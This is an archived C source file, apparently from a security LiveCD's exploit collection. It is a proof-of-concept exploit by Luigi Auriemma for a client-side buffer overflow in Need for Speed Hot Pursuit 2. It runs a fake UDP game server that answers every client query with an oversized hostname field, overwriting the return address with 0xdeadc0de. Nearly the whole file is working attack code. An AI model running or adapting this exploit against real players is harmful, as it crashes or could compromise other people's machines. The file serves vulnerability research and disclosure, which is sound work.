home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / nfs2 / nfshp2cbof.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.4 KB  |  186 lines
  1. /*
  2.  
  3. by Luigi Auriemma
  4.  
  5. UNIX & WIN VERSION
  6. */
  7.  
  8.  
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12.  
  13. #ifdef WIN32
  14.     #include <winsock.h>
  15.     #include "winerr.h"
  16.  
  17.     #define close   closesocket
  18. #else
  19.     #include <unistd.h>
  20.     #include <sys/socket.h>
  21.     #include <sys/types.h>
  22.     #include <arpa/inet.h>
  23.     #include <netdb.h>
  24. #endif
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. #define VER     "0.1"
  32. #define BUFFSZ  2048
  33. #define PORT    61220
  34. #define RETADD  0xdeadc0de
  35. #define RETOFF  540
  36. #define NFS240  "18022640"
  37. #define NFS242  "18088178"
  38. #define NFSOFF  669     /* referred to pck[] nver, don't change it */
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45. void std_err(void);
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52. int main(int argc, char *argv[]) {
  53.     int         sd,
  54.                 err,
  55.                 on = 1,
  56.                 psz;
  57.     struct  sockaddr_in peer;
  58.     u_char      *buff,
  59.                 pck[] =
  60.                 "\\gamename\\nfs6"
  61.                 "\\gamever\\240"    // it is useless
  62.                 "\\hostname\\"
  63.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  64.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  65.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  66.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  67.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  68.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  69.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  70.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  71.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  72.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  73.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  74.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  75.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  76.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  77.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  78.                 "aaaaaaaaaaaaaaaaaaaaaaaa"
  79.                 "0000"              // return address
  80.                 "\\hostport\\8511"
  81.                 "\\mapname\\Fall Winds"
  82.                 "\\gametype\\Single Race"
  83.                 "\\numplayers\\1"
  84.                 "\\maxplayers\\8"
  85.                 "\\gamemode\\openplaying"
  86.                 "\\pbmd\\0"
  87.                 "\\password\\0"
  88.                 "\\nver\\" NFS240
  89.                 "\\ctid\\6"
  90.                 "\\res\\38"
  91.                 "\\dir\\0"
  92.                 "\\laps\\2"
  93.                 "\\ded\\0"
  94.                 "\\final\\"
  95.                 "\\queryid\\2.1";
  96.  
  97.  
  98.     setbuf(stdout, NULL);
  99.  
  100.     fputs("\n"
  101.         "Need for Speed Hot pursuit 2 <= 242 client's buffer overflow "VER"\n"
  102.         "by Luigi Auriemma\n"
  103.         "e-mail: aluigi@altervista.org\n"
  104.         "web:    http://aluigi.altervista.org\n"
  105.         "\n", stdout);
  106.  
  107.     if(argc < 2) {
  108.         printf("\nUsage: %s <version>\n"
  109.             "\n"
  110.             "Version:\n"
  111.             "240 = this is the default (1.0) and more diffused version\n"
  112.             "242 = the latest patched version, rarely used by players\n"
  113.             "\n", argv[0]);
  114.         exit(1);
  115.     }
  116.  
  117.  
  118.     if(!memcmp(argv[1], "240", 3)) {
  119.         printf("Selected version 240 (nver %s)\n", NFS240);
  120.     } else if(!memcmp(argv[1], "242", 3)) {
  121.         printf("Selected version 242 (nver %s)\n", NFS242);
  122.         memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
  123.     } else {
  124.         printf("\nError: you must choose between 240 and 242 only\n");
  125.         exit(1);
  126.     }
  127.  
  128.  
  129. #ifdef WIN32
  130.     WSADATA    wsadata;
  131.     WSAStartup(MAKEWORD(1,0), &wsadata);
  132. #endif
  133.  
  134.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  135.     if(sd < 0) std_err();
  136.  
  137.     peer.sin_addr.s_addr = INADDR_ANY;
  138.     peer.sin_port        = htons(PORT);
  139.     peer.sin_family      = AF_INET;
  140.     psz                  = sizeof(peer);
  141.  
  142.     printf("\nBinding UDP port %u\n", PORT);
  143.  
  144.     err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
  145.     if(err < 0) std_err();
  146.     err = bind(sd, (struct sockaddr *)&peer, psz);
  147.     if(err < 0) std_err();
  148.  
  149.     printf("The return address will be overwritten with 0x%08x\n", RETADD);
  150.     *(u_long *)(pck + RETOFF) = RETADD;
  151.  
  152.     buff = malloc(BUFFSZ);
  153.     if(!buff) std_err();
  154.  
  155.     fputs("Clients:\n", stdout);
  156.     while(1) {
  157.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
  158.         if(err < 0) std_err();
  159.  
  160.         printf("%16s:%hu -> ",
  161.             inet_ntoa(peer.sin_addr), htons(peer.sin_port));
  162.  
  163.         err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, psz);
  164.         if(err < 0) std_err();
  165.         fputs("BOOM\n", stdout);
  166.     }
  167.  
  168.     close(sd);
  169.     return(0);
  170. }
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. #ifndef WIN32
  178.     void std_err(void) {
  179.         perror("\nError");
  180.         exit(1);
  181.     }
  182. #endif
  183.  
  184.  
  185.  
  186.